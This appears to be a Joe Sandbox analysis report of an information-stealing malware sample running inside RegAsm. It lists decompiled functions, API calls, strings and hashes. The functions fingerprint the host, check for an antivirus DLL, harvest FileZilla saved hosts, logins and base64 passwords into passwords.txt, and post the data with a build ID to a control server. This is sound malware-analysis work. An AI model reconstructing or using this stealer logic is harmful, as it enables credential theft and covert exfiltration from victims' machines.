HeapAlloc.KERNEL32(00000000), ref: 00410D50
GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
wsprintfA.USER32 ref: 00410D7D

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: 8156003ae2ba7e4b44e04d9edb8d9148e42b9655548c5c901af85341735e3e08
Instruction ID: caf3496bb33e6ba0959960e47458aa26311d6ef53a8a48f1899bbcb1f341be02
Opcode Fuzzy Hash: 8156003ae2ba7e4b44e04d9edb8d9148e42b9655548c5c901af85341735e3e08
Instruction Fuzzy Hash: 40F05070600324A7DB04DB74EC49B9B33699B04725F000295F111C71C0EB759F844785

Function 00410C53 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
Instruction ID: a2d0142ef4c2f8337792e91bc85231d42bd55b383edadc254ac7c872ecc74bf6
Opcode Fuzzy Hash: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
Instruction Fuzzy Hash: 33D05EB6200208BBD7449BD5EC8DF8E7BBCEB85725F100265FA46D2290DAF099488B34

Function 00410FBA Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 00410FD4
wsprintfA.USER32 ref: 00410FEC

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 37567d6e659b031875af45e68dac7a2455be4e9a44875f3cb64902c00df150dc
Instruction ID: b9d5f41220af3185496dac5b5e3dcb30fe98a9b599af34ff0529e18c8b474594
Opcode Fuzzy Hash: 37567d6e659b031875af45e68dac7a2455be4e9a44875f3cb64902c00df150dc
Instruction Fuzzy Hash: 79E09270D1021D9BCF04DFA0ED85ADDB7FDEB08208F0054B5A505E3180D674AB898F48

Function 004014AD Relevance: 1.3, APIs: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,?,?,?,?,?,00401503,avghookx.dll,0041850D), ref: 004014DF

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction ID: b529297655fd12c0b63a16027a5c7bdef515ed443d31e096b8a78f326fd23762
Opcode Fuzzy Hash: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction Fuzzy Hash: C1F08C32A00150EBCF20CF59D804AAAFBB8EB43760F257065E809B3260C334ED11EA9C

Function 00405482 Relevance: 72.3, APIs: 25, Strings: 16, Instructions: 573
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004175EA), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

lstrlenA.KERNEL32(?), ref: 00405519

Part of subcall function 00411E5D: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0065E908,?,?,?,0041286A,?,?,00000000), ref: 00411E7D
Part of subcall function 00411E5D: GetProcessHeap.KERNEL32(00000000,?,?,?,?,0041286A,?,?,00000000), ref: 00411E8A
Part of subcall function 00411E5D: HeapAlloc.KERNEL32(00000000,?,?,?,0041286A,?,?,00000000), ref: 00411E91

StrCmpCA.SHLWAPI(?,00436982,0043697F,0043697E,00436973), ref: 00405588
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004056C0
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00405704
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405736

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175B2,004366D6), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417083,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410650

lstrlenA.KERNEL32(?,",file_data,00437848,------,0043783C,?,",00437830,------,00437824,58cd250b15e666e5f72fcf5caa6cb131,",build_id,0043780C,------), ref: 00405C67
lstrlenA.KERNEL32(?), ref: 00405C7A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00405C92
HeapAlloc.KERNEL32(00000000), ref: 00405C99
lstrlenA.KERNEL32(?), ref: 00405CA6
_memmove.LIBCMT ref: 00405CB4
lstrlenA.KERNEL32(?,?,?), ref: 00405CC9
_memmove.LIBCMT ref: 00405CD6
lstrlenA.KERNEL32(?), ref: 00405CE4
lstrlenA.KERNEL32(?,?,00000000), ref: 00405CF2
_memmove.LIBCMT ref: 00405D05
lstrlenA.KERNEL32(?,?,00000000), ref: 00405D1A
HttpSendRequestA.WININET(?,?,00000000), ref: 00405D2D
HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405D6F
InternetReadFile.WININET(?,?,000007CF,?), ref: 00405E26
StrCmpCA.SHLWAPI(?,block), ref: 00405E3B
ExitProcess.KERNEL32 ref: 00405E46

Strings

------, xrefs: 00405605
", xrefs: 00405AD8
------, xrefs: 004059FF
ERROR, xrefs: 00405D79
------, xrefs: 0040589D
--, xrefs: 00405600
", xrefs: 00405C35
build_id, xrefs: 0040594F
ERROR, xrefs: 00405F2F
", xrefs: 0040581B
", xrefs: 0040597B
58cd250b15e666e5f72fcf5caa6cb131, xrefs: 004059A7
------, xrefs: 0040573C
------, xrefs: 00405B5D
file_data, xrefs: 00405C09
block, xrefs: 00405E30

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
String ID: ------$"$"$"$"$--$------$------$------$------$58cd250b15e666e5f72fcf5caa6cb131$ERROR$ERROR$block$build_id$file_data
API String ID: 2638065154-600367253
Opcode ID: 11b644e8b0ee020b983c4e21332ba6c0207cfda5a45792b5335aa5e12e6ebcc2
Instruction ID: 0358094c4ed1188e72ebe9b9f120e41e30dff06ecd2091aeb6422432c7e693ed
Opcode Fuzzy Hash: 11b644e8b0ee020b983c4e21332ba6c0207cfda5a45792b5335aa5e12e6ebcc2
Instruction Fuzzy Hash: 8242E771D401699BDF21FB21DC45ADDB3B9BF04308F0085E6A548B3152DAB46FCA9F98

Function 0040E6CF Relevance: 70.3, APIs: 30, Strings: 10, Instructions: 289
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175B2,004366D6), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417083,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410650

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004175EA), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,004168FA,?), ref: 00411E37

strtok_s.MSVCRT ref: 0040E77E
GetProcessHeap.KERNEL32(00000000,000F423F,00436921,0043690B,0043690A,00436907), ref: 0040E7C4
HeapAlloc.KERNEL32(00000000), ref: 0040E7CB
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040E7DF
lstrlenA.KERNEL32(00000000), ref: 0040E7EA
StrStrA.SHLWAPI(00000000,<Port>), ref: 0040E81E
lstrlenA.KERNEL32(00000000), ref: 0040E829
StrStrA.SHLWAPI(00000000,<User>), ref: 0040E857
lstrlenA.KERNEL32(00000000), ref: 0040E862
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040E890
lstrlenA.KERNEL32(00000000), ref: 0040E89B
lstrlenA.KERNEL32(?), ref: 0040E901
lstrlenA.KERNEL32(?), ref: 0040E915
lstrlenA.KERNEL32(0040ECBC), ref: 0040EA3D

Part of subcall function 00416E60: CreateThread.KERNEL32(00000000,00000000,00416D8F,?,00000000,00000000), ref: 00416EFF
Part of subcall function 00416E60: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F07

Strings

Soft: FileZilla, xrefs: 0040E948
Host: , xrefs: 0040E954
<Pass encoding="base64">, xrefs: 0040E88A
<Host>, xrefs: 0040E7D9
<User>, xrefs: 0040E851
<Port>, xrefs: 0040E818
Login: , xrefs: 0040E98C
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040E71F
passwords.txt, xrefs: 0040EA4D
Password: , xrefs: 0040E9AE

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
API String ID: 4146028692-935134978
Opcode ID: 9a286921faedaf07c47433d255e05d662fa7569b7ac3f3ed639b13c60048c9a5
Instruction ID: fd63b87309b75f474144e9289f0c2a5cbc93a3f4ace5c824b0701c05e7ba47e5
Opcode Fuzzy Hash: 9a286921faedaf07c47433d255e05d662fa7569b7ac3f3ed639b13c60048c9a5
Instruction Fuzzy Hash: 48A17572A40219ABCF01FBA1DD4AADD7775AF08305F105426F500F30A1EB79AE498F99

Function 00406BB5 Relevance: 63.6, APIs: 20, Strings: 16, Instructions: 598
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004175EA), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406C54
StrCmpCA.SHLWAPI(?), ref: 00406C72
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406E0A
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00406E4E
lstrlenA.KERNEL32(?,",status,00437990,------,00437984,",task_id,00437970,------,00437964,",mode,00437950,------,00437944), ref: 0040753C
lstrlenA.KERNEL32(?), ref: 0040754B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407556
HeapAlloc.KERNEL32(00000000), ref: 0040755D
lstrlenA.KERNEL32(?), ref: 0040756A
_memmove.LIBCMT ref: 00407578
lstrlenA.KERNEL32(?), ref: 00407586
lstrlenA.KERNEL32(?,?,00000000), ref: 00407594
_memmove.LIBCMT ref: 004075A1
lstrlenA.KERNEL32(?,?,00000000), ref: 004075B6
HttpSendRequestA.WININET(00000000,?,00000000), ref: 004075C4
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00407621
InternetCloseHandle.WININET(00000000), ref: 0040762C
InternetCloseHandle.WININET(?), ref: 00407638
InternetCloseHandle.WININET(?), ref: 00407644
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406E7C

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417083,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175B2,004366D6), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Strings

", xrefs: 004070C1
", xrefs: 004074DD
task_id, xrefs: 00407351
build_id, xrefs: 00407095
------, xrefs: 004073FF
------, xrefs: 00406CFC
", xrefs: 0040721D
------, xrefs: 0040729F
58cd250b15e666e5f72fcf5caa6cb131, xrefs: 004070ED
mode, xrefs: 004071F1
", xrefs: 00406F61
", xrefs: 0040737D
------, xrefs: 00406FE3
status, xrefs: 004074B1
------, xrefs: 00407145
------, xrefs: 00406E82

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
String ID: "$"$"$"$"$------$------$------$------$------$------$58cd250b15e666e5f72fcf5caa6cb131$build_id$mode$status$task_id
API String ID: 3702379033-2217042704
Opcode ID: 19771a40e8bdb25d9b12ba7ab68ed8efaebf4807a2bd007a1796df7fa0680fc2
Instruction ID: 794185a1fa7fea4ea139e75ccda2d60adc1beae91ce9f873f04dbe7a568b89d6
Opcode Fuzzy Hash: 19771a40e8bdb25d9b12ba7ab68ed8efaebf4807a2bd007a1796df7fa0680fc2
Instruction Fuzzy Hash: 4352897194016D9ACF61EB62CD46BCCB375AF04308F4184E7A61D73161DA746FCA8FA8

Function 00405F39 Relevance: 54.7, APIs: 20, Strings: 11, Instructions: 466
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004175EA), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
StrCmpCA.SHLWAPI(?), ref: 00405FF6
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
lstrlenA.KERNEL32(?,",mode,004378D0,------,004378C4,58cd250b15e666e5f72fcf5caa6cb131,",build_id,004378AC,------,004378A0,",00437894,------), ref: 004065FD
lstrlenA.KERNEL32(?), ref: 0040660C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00406617
HeapAlloc.KERNEL32(00000000), ref: 0040661E
lstrlenA.KERNEL32(?), ref: 0040662B
_memmove.LIBCMT ref: 00406639
lstrlenA.KERNEL32(?), ref: 00406647
lstrlenA.KERNEL32(?,?,00000000), ref: 00406655
_memmove.LIBCMT ref: 00406662
lstrlenA.KERNEL32(?,?,00000000), ref: 00406677
HttpSendRequestA.WININET(00000000,?,00000000), ref: 00406685
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004066E2
InternetCloseHandle.WININET(00000000), ref: 004066ED
InternetCloseHandle.WININET(?), ref: 004066F9
InternetCloseHandle.WININET(?), ref: 00406705
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417083,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175B2,004366D6), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Strings

", xrefs: 004062E5
------, xrefs: 00406367
mode, xrefs: 00406575
58cd250b15e666e5f72fcf5caa6cb131, xrefs: 00406471
", xrefs: 00406445
------, xrefs: 004064C9
", xrefs: 004065A1
------, xrefs: 00406080
build_id, xrefs: 00406419
_wA, xrefs: 004067D8
------, xrefs: 00406206

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

